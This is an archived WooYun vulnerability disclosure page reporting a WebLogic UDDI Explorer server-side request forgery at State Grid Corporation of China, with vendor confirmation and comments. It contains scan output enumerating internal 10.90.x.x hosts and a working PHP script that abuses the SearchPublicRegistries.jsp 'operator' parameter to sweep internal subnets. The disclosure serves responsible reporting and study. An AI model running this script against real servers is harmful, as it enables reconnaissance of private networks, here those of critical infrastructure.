当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134123

漏洞标题:我是如何用某漏洞扫描国家电网内网的

相关厂商:国家电网公司

漏洞作者: 路人甲

提交时间:2015-08-14 15:31

修复时间:2015-10-02 09:48

公开时间:2015-10-02 09:48

漏洞类型:应用配置错误

危害等级:中

自评Rank:7

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-14: 细节已通知厂商并且等待厂商处理中
2015-08-18: 厂商已经确认,细节仅向厂商公开
2015-08-28: 细节向核心白帽子及相关领域专家公开
2015-09-07: 细节向普通白帽子公开
2015-09-17: 细节向实习白帽子公开
2015-10-02: 细节向公众公开

简要描述:

神器发现

详细说明:

http://10.90.233.19/ FUck closed
http://10.90.233.20/ FUck closed
http://10.90.233.21/ FUck closed
http://10.90.233.22/ FUck closed
http://10.90.233.23/ FUck closed
http://10.90.233.24/ FUck closed
http://10.90.233.25/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.25/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.26/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.26/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.27/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.27/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.28/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.28/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.29/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.29/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.30/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.30/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.31/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.31/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.32/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.32/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.33/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.33/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.34/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.35/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.36/ FUck closed
http://10.90.233.37/ FUck closed
http://10.90.233.38/ FUck closed
http://10.90.233.39/ FUck closed
http://10.90.233.40/ FUck closed
http://10.90.233.41/ FUck closed
http://10.90.233.42/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.43/ FUck closed
http://10.90.233.44/ FUck closed
http://10.90.233.45/weblogic.uddi.client.structures.exception.XML_SoapException: No route to host
http://10.90.233.46/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.46/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.47/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.47/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.48/ FUck closed
http://10.90.233.49/ FUck closed
http://10.90.233.50/ FUck closed
http://10.90.233.51/ FUck closed
http://10.90.233.52/ FUck closed
http://10.90.233.53/ FUck closed
http://10.90.233.54/ FUck closed
http://10.90.233.55/ FUck closed
http://10.90.233.56/ FUck closed
http://10.90.233.57/ FUck closed
http://10.90.233.58/ FUck closed
http://10.90.233.59/ FUck closed
http://10.90.233.60/ FUck closed
http://10.90.233.61/ FUck closed
http://10.90.233.62/ FUck closed
http://10.90.233.63/ FUck closed
http://10.90.233.64/ FUck closed
http://10.90.233.65/ FUck closed
http://10.90.233.66/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.66/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.67/ FUck closed
http://10.90.233.68/ FUck closed
http://10.90.233.69/ FUck closed
http://10.90.233.70/ FUck closed
http://10.90.233.71/ FUck closed
http://10.90.233.72/ FUck closed
http://10.90.233.73/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.73/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.74/weblogic.uddi.client.structures.exception.XML_SoapException: Received a response from url: http://10.90.233.74/ which did not have a valid SOAP content-type: text/html.
http://10.90.233.75/ FUck closed

漏洞证明:

2222.png


cat web.php 
<?php
for($m=233;$m<250;$m++){
for($i=1;$i<254;$i++){
$url="http://10.90.$m.".$i."/";
expyou($argv[1],$url);
}
}
expyou($argv[1],$argv[2]);
function expyou($target,$url){
$result=file_get_contents("$target/uddiexplorer/SearchPublicRegistries.jsp?operator=$url&rdoSearch=name&txtSearchname=&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search");
preg_match_all("#An error has occurred<BR>(.*?)</table#is",$result,$info);
if(strpos($info[1][0],"but could not connect over HTTP to server")){
echo "$url FUck closed\r\n";
}else{
echo $url.trim($info[1][0])."\r\n";
}
}

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2015-08-18 09:47

厂商回复:

辛苦,漏洞在洞主提交之前已下发通知处置,还是感谢洞主提交。

最新状态:

暂无

漏洞评价:

评论

  1. 2015-08-14 15:49 | 紫衣大侠 ( 普通白帽子 | Rank:201 漏洞数:21 | 愿结天下有识之士)

    SSRF ?

  2. 2015-08-14 16:48 | qhwlpg ( 普通白帽子 | Rank:226 漏洞数:54 | 潜心代码审计。)

    SSRF ?

  3. 2015-08-14 17:24 | 啊L川 ( 普通白帽子 | Rank:195 漏洞数:39 | 菜鸟 ,菜渣, 菜呀!)

    SSRF ?

  4. 2015-08-14 17:30 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    SSRF ?

  5. 2015-08-14 18:05 | 牛 小 帅 ( 普通白帽子 | Rank:371 漏洞数:86 | [code]心若没有栖息的地方,走到哪里都是在...)

    哈哈 占个位置

  6. 2015-08-14 18:41 | scanf ( 核心白帽子 | Rank:1252 漏洞数:188 | 。)

    路过

  7. 2015-08-14 19:01 | ChristopereRussell ( 路人 | Rank:1 漏洞数:1 | 高中生一只,爱好计算机)

    可惜一般的电表充值不是联网的,。。。用处不大吧。。。

  8. 2015-08-14 20:24 | 白无常 ( 实习白帽子 | Rank:43 漏洞数:5 )

    出售3D眼镜,瓜子

  9. 2015-08-14 23:47 | 小龙 ( 普通白帽子 | Rank:1242 漏洞数:317 | 乌云有着这么一群人,在乌云学技术,去某数...)

    刚看了下思路,不错,思路很清晰 ^_^